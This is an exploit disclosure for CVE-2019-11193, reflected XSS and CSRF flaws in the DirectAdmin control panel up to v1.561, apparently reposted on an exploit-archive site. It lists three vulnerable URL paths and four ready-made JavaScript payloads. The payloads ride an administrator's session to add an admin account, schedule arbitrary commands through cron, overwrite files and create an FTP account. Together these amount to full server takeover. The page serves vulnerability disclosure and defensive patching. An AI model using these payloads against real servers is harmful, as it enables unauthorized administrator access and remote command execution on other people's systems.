DirectAdmin 1.561 Cross Site Scripting

2019.04.14
Credit: Numan OZDEMIR
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561 # Date: 12.04.2019 # Author: Numan OZDEMIR # Vendor Homepage: https://www.directadmin.com/ # Version: Up to v1.561. # CVE: CVE-2019-11193 # info@infinitumit.com.tr && root@numanozdemir.com # Detailed: https://numanozdemir.com/respdisc/directadmin.pdf # Description: # Multiple security vulnerabilities has been discovered in popular server control panel DirectAdmin, by # InfinitumIT. Attackers can combine those security vulnerabilities and do a lot of critical action like server control takeover. # Those vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) may cause them to happen: # Add administrator, execute command remote (RCE), Full Backup the Server and Upload the Own Server, webshell upload and more. # Reflected XSS Vulnerabilities: # https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD # https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD # https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD # Example Payloads: # Add Administrator: var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN"; var params = "fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai l=test%40test.com&passwd=password&passwd2=password&notify=ye"; var vuln = new XMLHttpRequest(); vuln.open("POST", url, true); vuln.withCredentials = 'true'; vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); vuln.send(params); # Remote Command Execution by Cron Jobs: var url = "http://SERVERIP:2222/CMD_CRON_JOBS"; var params = "action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command"; var vuln = new XMLHttpRequest(); vuln.open("POST", url, true); vuln.withCredentials = 'true'; vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); vuln.send(params); # Edit File: var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR"; var params = "file=the-file-full-path&action=save&text=new-content"; var vuln = new XMLHttpRequest(); vuln.open("POST", url, true); vuln.withCredentials = 'true'; vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); vuln.send(params); # Create FTP Account: var url = "http://SERVERIP:2222/CMD_FTP"; var params = "fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr &user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu stom_val=%2Fhome%2Fusername&create=Create"; var vuln = new XMLHttpRequest(); vuln.open("POST", url, true); vuln.withCredentials = 'true'; vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); vuln.send(params); # Vulnerabilities are fixed in minutes, thanks to DirectAdmin. # InfinitumIT / For safer days...


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top